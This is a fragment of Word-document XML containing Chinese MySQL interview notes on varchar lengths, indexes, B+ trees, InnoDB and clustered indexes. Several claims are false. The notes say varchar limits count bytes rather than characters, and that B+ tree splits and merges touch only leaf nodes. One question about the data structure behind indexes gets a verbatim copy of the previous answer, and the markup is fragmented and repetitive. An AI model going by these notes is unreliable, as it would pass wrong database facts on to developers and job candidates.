          <w:numId w:val="1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varchar(10) 和 varchar(20)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在关系型数据库中，varchar(10) 和 varchar(20) 是两种不同的数据类型，用于存储可变长度的字符串数据。它们的主要区别在于存储限制。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varchar(10) 表示最多可以存储 10 个字符的字符串，而 varchar(20) 则表示最多可以存储 20 个字符的字符串。这意味着，varchar(20) 可以存储更长的字符串，但同时也需要更多的存储空间。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实际上，varchar 数据类型的长度限制是以字节为单位计算的，而不是以字符为单位计算的。在使用 varchar 类型时，需要考虑字符编码的影响。例如，如果使用 utf8mb4 字符编码，一个中文字符占用 3 个字节，那么 varchar(10) 可以存储最多 3 个中文字符，而 varchar(20) 可以存储最多 6 个中文字符。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因此，选择使用 varchar(10) 还是 varchar(20) 取决于存储数据的实际需求和限制，例如存储的数据长度、字符编码、存储空间等方面的考虑。需要根据具体情况进行权衡和选择</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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谈谈你对索引的理解？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在关系型数据库中，索引是一种特殊的数据结构，用于加速数据检索操作。它可以类比于书籍的目录，将数据库表中的数据按照一定的规则组织起来，以便更快地查找所需要的数据。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在实际使用中，索引可以分为多种类型，如 B-Tree 索引、哈希索引、全文索引等。其中，B-Tree 索引是最常用的一种索引类型，它使用一种类似于二叉树的数据结构，将索引键值按照一定的顺序组织起来，以便更快地查找目标数据。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的作用在于加速数据检索操作。使用索引可以避免全表扫描，提高数据检索的效率。特别是对于大型的数据表，使用索引可以使查询速度大大提高。但同时，索引也会占用一定的存储空间，增加数据写入和更新的时间，因此需要权衡索引的使用与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在实际使用索引时，需要注意以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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对于经常用于查询条件的列，可以考虑添加索引以提高查询效率；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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对于数据量比较小的表，可以不添加索引，因为全表扫描的代价较小；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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索引的设计应该遵循最左前缀原则，即多个列组成的索引，查询条件必须从左边开始，否则索引失效；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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考虑定期进行索引维护和优化，删除无用的索引和合并重复的索引，以减少存储空间和提高查询效率。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总之，索引是关系型数据库中非常重要的概念，对于大型数据表的查询和数据检索操作，使用索引可以显著提高查询效率和性能。但同时，也需要注意索引的使用和优化，以避免出现性能问题和资源浪费。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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索引的底层使用的是什么数据结构？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在关系型数据库中，索引是一种特殊的数据结构，用于加速数据检索操作。它可以类比于书籍的目录，将数据库表中的数据按照一定的规则组织起来，以便更快地查找所需要的数据。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在实际使用中，索引可以分为多种类型，如 B-Tree 索引、哈希索引、全文索引等。其中，B-Tree 索引是最常用的一种索引类型，它使用一种类似于二叉树的数据结构，将索引键值按照一定的顺序组织起来，以便更快地查找目标数据。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索引的作用在于加速数据检索操作。使用索引可以避免全表扫描，提高数据检索的效率。特别是对于大型的数据表，使用索引可以使查询速度大大提高。但同时，索引也会占用一定的存储空间，增加数据写入和更新的时间，因此需要权衡索引的使用与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在实际使用索引时，需要注意以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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对于经常用于查询条件的列，可以考虑添加索引以提高查询效率；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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对于数据量比较小的表，可以不添加索引，因为全表扫描的代价较小；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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索引的设计应该遵循最左前缀原则，即多个列组成的索引，查询条件必须从左边开始，否则索引失效；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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考虑定期进行索引维护和优化，删除无用的索引和合并重复的索引，以减少存储空间和提高查询效率。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总之，索引是关系型数据库中非常重要的概念，对于大型数据表的查询和数据检索操作，使用索引可以显著提高查询效率和性能。但同时，也需要注意索引的使用和优化，以避免出现性能问题和资源浪费。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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B+ 树的理解？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B树的特点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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节点排序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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⼀个节点了可以存多个元素，多个元素也排序了 B+树的特点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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拥有B树的特点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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叶⼦节点之间有指针</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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⾮叶⼦节点上的元素在叶⼦节点上都冗余了，也就是叶⼦节点中存储了所有的元素，并且排好顺序 Mysql索引使⽤的是B+树，因为索引是⽤来加快查询的，⽽B+树通过对数据进⾏排序所以是可以提⾼查 询速度的，然后通过⼀个节点中可以存储多个元素，从⽽可以使得B+树的⾼度不会太⾼，在Mysql中⼀ 个Innodb⻚就是⼀个B+树节点，⼀个Innodb⻚默认16kb，所以⼀般情况下⼀颗两层的B+树可以存2000 32 万⾏左右的数据，然后通过利⽤B+树叶⼦节点存储了所有数据并且进⾏了排序，并且叶⼦节点之间有指 针，可以很好的⽀持全表扫描，范围查找等SQL语句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 InnoDB 存储引擎选用 B+ 树而不是 B 树呢？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InnoDB 存储引擎选择使用B+树而不是B树，是因为B+树相对于B树具有更好的性能和更适合数据库应用的特性。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首先，B+树在内部节点上只存储关键字信息而不存储数据记录，而在叶子节点上存储数据记录，因此具有更高的查询效率。在进行范围查询时，B+树可以通过遍历叶子节点来获取所有符合查询条件的数据，这种方式比B树更加高效。同时，由于B+树叶子节点形成一个有序链表，也可以方便地进行数据的顺序访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其次，B+树的叶子节点通过链表的方式连接起来，使得范围查询和分页查询更加方便。在B树中，叶子节点不是以链表的形式连接，而是通过节点之间的指针来连接，这样会增加数据查找时的开销。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最后，B+树的分裂和合并仅影响叶子节点，不影响内部节点，这样可以减少磁盘I/O操作的次数，提高写入性能和可靠性。相比之下，B树的分裂和合并可能会影响到内部节点，导致写入性能下降。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因此，InnoDB 存储引擎选择使用B+树而不是B树，是为了提高查询效率、支持范围查询和分页查询，并减少磁盘I/O操作的次数，以提高性能和可靠性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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谈谈你对聚簇索引的理解？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聚簇索引是一种数据库索引的实现方式，它将表的行存储在索引的叶子节点中，而非在数据页中，因此聚簇索引也被称为聚集索引或主键索引。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聚簇索引中，索引键的顺序决定了数据在磁盘上的物理顺序，因此聚簇索引对于查询使用索引键的列时具有非常高的查询效率。此外，聚簇索引还可以提高表的插入性能，因为当数据被插入时，它们可以直接插入到相应的位置，而不需要进行额外的排序和移动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然而，聚簇索引也存在一些缺点。例如，当表被频繁更新时，由于行的物理位置与索引键的顺序紧密相关，因此更新可能需要大量的重排操作。此外，由于聚簇索引的结构比较紧密，因此在索引范围扫描时，聚簇索引需要读取的数据页较多，可能会影响查询的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因此，选择使用聚簇索引还是非聚簇索引取决于具体的数据特点和应用场景。在选择时，需要综合考虑查询性能、插入性能、更新性能等因素，并根据实际情况进行权衡。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mysql聚簇和非聚簇索引的区别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都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树的数据结构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聚簇索引：将数据存储与索引放到了一块、并且是按照一定的顺序组织的，找到索引也就找到了数</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据，数据的物理存放顺序与索引顺序是一致的，即：只要索引是相邻的，那么对应的数据一定也是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相邻地存放在磁盘上的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非聚簇索引：叶子节点不存储数据、存储的是数据行地址，也就是说根据索引查找到数据行的位置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再取磁盘查找数据，这个就有点类似一本树的目录，比如我们要找第三章第一节，那我们先在这个</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目录里面找，找到对应的页码后再去对应的页码看文章。</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InnoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中一定有主键，主键一定是聚簇索引，不手动设置、则会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引，没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>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则会使用数据库内部的一个行的隐藏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来当作主键索引。在聚簇索引之上创建的索引称之为辅助索引，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辅助索引访问数据总是需要二次查找，非聚簇索引都是辅助索引，像复合索引、前缀索引、唯一索引，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辅助索引叶子节点存储的不再是行的物理位置，而是主键值</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MyISM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用的是非聚簇索引，没有聚簇索引，非聚簇索引的两棵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树看上去没什么不同，节点的结构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完全一致只是存储的内容不同而已，主键索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树的节点存储了主键，辅助键索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树存储了辅助</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键。表数据存储在独立的地方，这两颗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树的叶子节点都使用一个地址指向真正的表数据，对于表数据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来说，这两个键没有任何差别。由于索引树是独立的，通过辅助键检索无需访问主键的索引树。</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如果涉及到大数据量的排序、全表扫描、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>之类的操作的话，还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>占优势些，因为索引所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占空间小，这些操作是需要在内存中完成的。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 xml:space="preserve">优势： </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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、查询通过聚簇索引可以直接获取数据，相比非聚簇索引需要第二次查询（非覆盖索引的情况下）效率要高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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、聚簇索引对于范围查询的效率很高，因为其数据是按照大小排列的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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、聚簇索引适合用在排序的场合，非聚簇索引不适合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劣势：</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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、维护索引很昂贵，特别是插入新行或者主键被更新导至要分页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(page split)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的时候。建议在大量插</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入新行后，选在负载较低的时间段，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OPTIMIZE TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>优化表，因为必须被移动的行数据可能造成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碎片。使用独享表空间可以弱化碎片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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、表因为使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
